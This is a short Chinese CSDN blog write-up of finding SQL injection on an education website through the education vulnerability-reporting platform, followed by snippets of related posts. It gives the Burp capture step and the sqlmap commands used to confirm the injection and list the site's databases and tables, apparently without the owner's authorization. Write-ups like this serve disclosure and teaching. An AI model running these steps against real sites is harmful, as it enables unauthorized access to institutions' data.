记一次教育src挖洞

最新推荐文章于 2024-06-19 15:19:12 发布
最新推荐文章于 2024-06-19 15:19:12 发布
阅读量3.7k 收藏 36
点赞数 1
文章标签: 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43658354/article/details/117512679
版权

记一次教育src挖洞

fofa搜索了一下,找到一个有sql注入的教育网站

#fofa搜索了一下,找到一个有sql注入的教育完整

漏洞url:http://x.x.x.x:8090/login

打开网站,随便输入数字,用burp抓包,在账号后面加*,保存到1.txt
在这里插入图片描述sqlmap跑,存在sql注入
python sqlmap.py -r 1.txt --level 2

在这里插入图片描述
爆数据库
python sqlmap.py -r 1.txt --level 2 --dbs

在这里插入图片描述
数据太多了,只能挑几个表跑
python sqlmap.py -r 1.txt --level 2 --tables -D “examxx,mysql,yxzs-jxjsxy”
在这里插入图片描述数据敏感,直接提交教育,第二天就可以拿到教育src邀请码

在这里插入图片描述

lanyincao666
关注
  • 1
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
一次src挖洞实战——逻辑漏洞
wulanlin的博客
01-08 5950
前言 在学习了大量web逻辑漏洞的知识后,想进行实战。练练手。作为小菜鸡的我,这是我第二次进行实战挖洞,可能会存在许多问题。望各位大师傅多多指点。 闲话少说,直接开整 实战 1.信息收集 首先,在src中找了一个网站应用,获得其域名地址为 “****.****.com”。 接下来就是一些常规操作(信息收集)啦。。。 1. 域名反查IP 我使用的是“超级ping”网站,不仅可以查看域名对应的IP地址,还可以查看其网址是否使用CDN技术,至于CDN技术是什么,我就不多说啦。 可以.
SScan:一款src捡洞扫描器
05-02
SScan前言一款src捡洞扫描器,因没时间挖src,毕竟挖src是个费时费力的活,自19年8月起入坑至今,依靠 扫描出的信息和漏洞,利用业余时间从扫描报告中的资产捡洞和找洞,已经3次jd月度前十。萌发出自己写扫描器挖洞...
一次eduSRC挖掘
Askshhbs的博客
04-22 6888
eduSRC介绍 今天闲来无事,想搞个eduSRC账号玩一玩,研究了一下,发现edu账号有两种获取方法:1、有账号的或者内部人员邀请你,2、提交一个高校的漏洞并通过审核。像我这种diao毛,怎么会有内部人员邀请我呢?,于是开始自己挖掘。 确认目标 我先用百度语法搜索了一下, inurl:edu.cn 搜索出来一大堆,我就一个一个进去点了点,(注:未经允许授权,不要用扫描器),发现有一个edu的信息公开界面的URL有点不对,总感觉眼熟。 开始测试 经过我一系列手工测试后发现,URL中的
vue-element-admin-master 用户登录和注册+整合JWT
♚焕蓝·未来的博客
09-28 1834
vue-element-admin 是一个后台前端解决方案,它基于 vue 和 element-ui实现。它使用了最新的前端技术栈,内置了 i18 国际化解决方案,动态路由,权限验证,提炼了典型的业务模型,提供了丰富的功能组件,它可以帮助你快速搭建企业级中后台产品原型。相信不管你的需求是什么,本项目都能帮助到你。
edusrc挖掘技巧总结(全)
weixin_45997442的博客
05-05 1302
对于新人刚开设挖edusrc的时候需要花大量的时间来找系统和信息收集,当你遇见的系统又waf的时候可以适当的放弃别再这上面花时间了,列入sql注入,一个单引号尝试报错和闭合(最多就是把简单的绕过尝试一下)如果不行,那就果断放弃,xss的话在edu的模块是不需要花大量时间,但是为了后面的企业src可以更好的理解xss可以尝试挖掘一些(在控制台弹窗测试,因为未授权,出了问题别找我)这就是对于top10漏洞的技巧。
一次真实src漏洞挖掘笔
m0_63028223的博客
06-15 738
src漏洞挖掘遇到的问题
我的edu src 挖洞技巧分享
qq_63217130的博客
05-18 1678
本文分享一些在挖edu时候的一些拙见,望各大师傅多多补充
【渗透测试】浅一次挖洞经历
qq_48201589的博客
04-16 6610
一次比较愉快的挖洞历程 一开始拿到主站,翻了翻没啥可用的中间件漏洞版本信息。所以,还是那句老话:柿子还是要挑软的捏。光速去搜寻他的旁站(我用的是奇安信的Hunter)。 果不其然搜索到了他的后台登录系统。既然是登录,当然要用BP去爆破一下他的密码了。一般后台用户名要么是admin,要么是root。 很幸运,又让我成功的爆破了出来他的密码。弱口令+1。 进入后台,就要尝试有没有出现未授权访问了,没有的话也别灰心,继续去找它的功能点,比如他的搜索框。(很容易有SQL注入) 用BP抓..
src挖掘-教育行业平台,规则,批量自动化
m0_61786761的博客
09-01 1874
属于b/s形式,用soap方式http访问,用xml返回。1.下载网上开源PHP代码,搭建后发现漏洞如弱口令->进行批量测试Python。寻找web.config,看配置文件或源码,找asmx结尾的文件。admin目录下的漏洞需要权限才能利用,可以先不看。可以把网站源码封装于.dll文件中的还原为源码。src挖掘-教育行业平台,规则,批量自动化。4.无源码情况下,js接口数据提交测试模拟。3.只收前端打入的漏洞平台-针对闭源系统。-jsfinder工具,手工,扫描。cnvd漏洞平台,盒子,补天。
create-react-app 没有[src] 文件夹(一次问题)
01-07
缘起 在使用 npx create-react-app xx-app 的时候创建项目后没有scr 文件夹,看了一下package.json也不对 然后顺势检查来一下 nodejs npm yarn 什么的都是正常的, 非常疑惑,然后去github 翻了翻 ...
某某某某某某src培训资料一
最新发布
06-27
某某某某某某src培训资料一
edusrc-web:edusrc用户主页数据分析与查询
03-15
edusrc网站 edusrc用户主页在线数据分析与查询
教育科研-学习工具-SRC柱钢骨与RC梁钢筋连接结构.zip
08-14
在学习工具中,《SRC柱钢骨与RC梁钢筋连接结构.pdf》这份文档很可能是对这一主题的详细阐述,涵盖了理论知识、设计原则、施工技术以及相关案例分析。对于学生和从业人员来说,深入理解并掌握这些知识,将有助于提升...
教育科研-学习工具-SRC柱钢骨与RC梁钢筋连接结构及方法.zip
08-14
SRC柱钢骨与RC梁钢筋连接结构及方法》是一个教育科研领域的学习资源,主要探讨了在建筑结构设计中SRC柱(Steel Reinforced Concrete Column,即钢骨混凝土柱)与RC梁(Reinforced Concrete Beam,即钢筋混凝土梁)...
一次挖edusrc漏洞挖掘(sql注入)
Lulzcart的博客
01-22 1906
一次挖edusrc漏洞挖掘(sql注入)
我的第一次edusrc漏洞挖掘 (三连挖)
M1n9K1n9的博客
01-26 8226
弱口令未授权访问任意文件上传文章内提及的漏洞均已修复!白帽子在挖掘、提交相关漏洞的过程中,应严格遵守中华人民共和国相关法律法规。
SRC——教育漏洞平台
qi_SJQ_的博客
02-25 3885
常规漏洞:利用漏扫工具扫,或者拿到url跑脚本批量验证,挂在服务器上批量跑就行了 特殊漏洞(定点检测):经常关注最新安全情报(知道创宇、cvvd等平台),收集最新poc、exp,或者自己去二次开发后拿去跑 切遵守相关法律法规,验证漏洞存在就够了。 教育平台评分规则(以官网为主): ...
edusrc教育src漏洞平台
03-01 8441
听说2022年度前十会有证书,这不得冲一波
南开大学漏洞报送证书【文尾福利-不限量送邀请码
honest_gg的博客
06-19 423
南开大学漏洞报送证书实物
教育src批量搜索后台
10-18
教育SRC批量搜索后台是一个为教育机构提供的一种方便快捷的搜索工具。它是基于SRC(Search and Rescue Catalog)数据库设计和开发的。SRC批量搜索后台可以帮助教育机构快速检索到他们所需的教育资源,包括课程资料、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值